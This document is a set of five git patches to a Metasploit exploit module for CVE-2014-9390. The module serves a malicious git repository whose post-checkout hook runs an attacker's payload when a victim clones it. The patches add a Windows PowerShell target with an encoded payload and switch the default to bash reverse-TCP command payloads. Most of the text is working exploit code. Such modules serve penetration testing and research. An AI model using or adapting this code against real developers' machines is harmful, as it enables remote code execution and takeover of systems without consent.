From 42a10d6d5097f83928f0fe55b611109febe32cc5 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Tue, 23 Dec 2014 14:07:57 +0000 Subject: [PATCH 1/5] Add Powershell target --- modules/exploits/multi/http/cve_2014_9390.rb | 17 ++++++++++++++++- 1 file changed, 16 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/cve_2014_9390.rb b/modules/exploits/multi/http/cve_2014_9390.rb index 5e51806209..e74acabf64 100644 --- a/modules/exploits/multi/http/cve_2014_9390.rb +++ b/modules/exploits/multi/http/cve_2014_9390.rb @@ -9,6 +9,7 @@ class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::Powershell def initialize(info = {}) super(update_info( @@ -72,6 +73,13 @@ class Metasploit4 < Msf::Exploit::Remote 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD } + ], + [ + 'Windows Powershell', + { + 'Platform' => [ 'windows' ], + 'Arch' => [ARCH_X86, ARCH_X86_64] + } ] ], 'DefaultTarget' => 0)) @@ -120,7 +128,14 @@ class Metasploit4 < Msf::Exploit::Remote # .git/hooks/post-checkout and will subsequently execute commands of our # choosing upon cloning # build the hook file blob - full_cmd = "#!/bin/sh\n#{payload.encoded}\n" + puts target.inspect + case target.name + when 'Automatic' + full_cmd = "#!/bin/sh\n#{payload.encoded}\n" + when 'Windows Powershell' + full_cmd = "#!/bin/sh\n#{cmd_psh_payload(payload.encoded, payload_instance.arch.first)}" + end + sha1, content = build_object('blob', full_cmd) trigger = "/objects/#{get_path(sha1)}" @repo_data[:git][:trigger] = trigger From 43221d4cb09f6faf4c28c94da9be8bbf52ab43ea Mon Sep 17 00:00:00 2001 From: Meatballs Date: Tue, 23 Dec 2014 14:09:12 +0000 Subject: [PATCH 2/5] Remove redundant debugging stuff --- modules/exploits/multi/http/cve_2014_9390.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/multi/http/cve_2014_9390.rb b/modules/exploits/multi/http/cve_2014_9390.rb index e74acabf64..e984aa3930 100644 --- a/modules/exploits/multi/http/cve_2014_9390.rb +++ b/modules/exploits/multi/http/cve_2014_9390.rb @@ -128,7 +128,6 @@ class Metasploit4 < Msf::Exploit::Remote # .git/hooks/post-checkout and will subsequently execute commands of our # choosing upon cloning # build the hook file blob - puts target.inspect case target.name when 'Automatic' full_cmd = "#!/bin/sh\n#{payload.encoded}\n" From 313d6cc2f8308d2ab3e3d5f3ee1e9482ed118bcb Mon Sep 17 00:00:00 2001 From: Meatballs Date: Tue, 23 Dec 2014 14:12:47 +0000 Subject: [PATCH 3/5] Add super call --- modules/exploits/multi/http/cve_2014_9390.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/exploits/multi/http/cve_2014_9390.rb b/modules/exploits/multi/http/cve_2014_9390.rb index e984aa3930..c6894ba08b 100644 --- a/modules/exploits/multi/http/cve_2014_9390.rb +++ b/modules/exploits/multi/http/cve_2014_9390.rb @@ -110,6 +110,8 @@ class Metasploit4 < Msf::Exploit::Remote end setup_git unless git_uri.blank? setup_mercurial unless mercurial_uri.blank? + + super end def setup_git From a3b0b9de62bbe852626be73a1451349098fd13d8 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Tue, 23 Dec 2014 14:19:51 +0000 Subject: [PATCH 4/5] Configure module to target bash by default --- modules/exploits/multi/http/cve_2014_9390.rb | 29 ++++++++++---------- 1 file changed, 15 insertions(+), 14 deletions(-) diff --git a/modules/exploits/multi/http/cve_2014_9390.rb b/modules/exploits/multi/http/cve_2014_9390.rb index c6894ba08b..707eadcbf2 100644 --- a/modules/exploits/multi/http/cve_2014_9390.rb +++ b/modules/exploits/multi/http/cve_2014_9390.rb @@ -54,24 +54,21 @@ class Metasploit4 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Dec 18 2014', - # TODO: correct all of this - 'Payload' => - { - 'Compat' => - { - 'PayloadType' => 'cmd', - 'RequiredCmd' => 'generic perl bash' - }, - 'EncoderType' => Msf::Encoder::Type::Raw - }, - 'Platform' => %w(osx win), - 'Targets' => + 'Targets' => [ [ 'Automatic', { 'Platform' => [ 'unix' ], - 'Arch' => ARCH_CMD + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd_bash', + 'RequiredCmd' => 'generic bash-tcp' + }, + } } ], [ @@ -134,7 +131,11 @@ class Metasploit4 < Msf::Exploit::Remote when 'Automatic' full_cmd = "#!/bin/sh\n#{payload.encoded}\n" when 'Windows Powershell' - full_cmd = "#!/bin/sh\n#{cmd_psh_payload(payload.encoded, payload_instance.arch.first)}" + psh = cmd_psh_payload(payload.encoded, + payload_instance.arch.first, + remove_comspec: true, + encode_final_payload: true) + full_cmd = "#!/bin/sh\n#{psh}" end sha1, content = build_object('blob', full_cmd) From 16302f752e4adcf14f0f0d6b409ba46924289156 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Tue, 23 Dec 2014 14:22:26 +0000 Subject: [PATCH 5/5] Enable generic command --- modules/exploits/multi/http/cve_2014_9390.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/cve_2014_9390.rb b/modules/exploits/multi/http/cve_2014_9390.rb index 707eadcbf2..763a18f04b 100644 --- a/modules/exploits/multi/http/cve_2014_9390.rb +++ b/modules/exploits/multi/http/cve_2014_9390.rb @@ -65,7 +65,7 @@ class Metasploit4 < Msf::Exploit::Remote { 'Compat' => { - 'PayloadType' => 'cmd_bash', + 'PayloadType' => 'cmd cmd_bash', 'RequiredCmd' => 'generic bash-tcp' }, }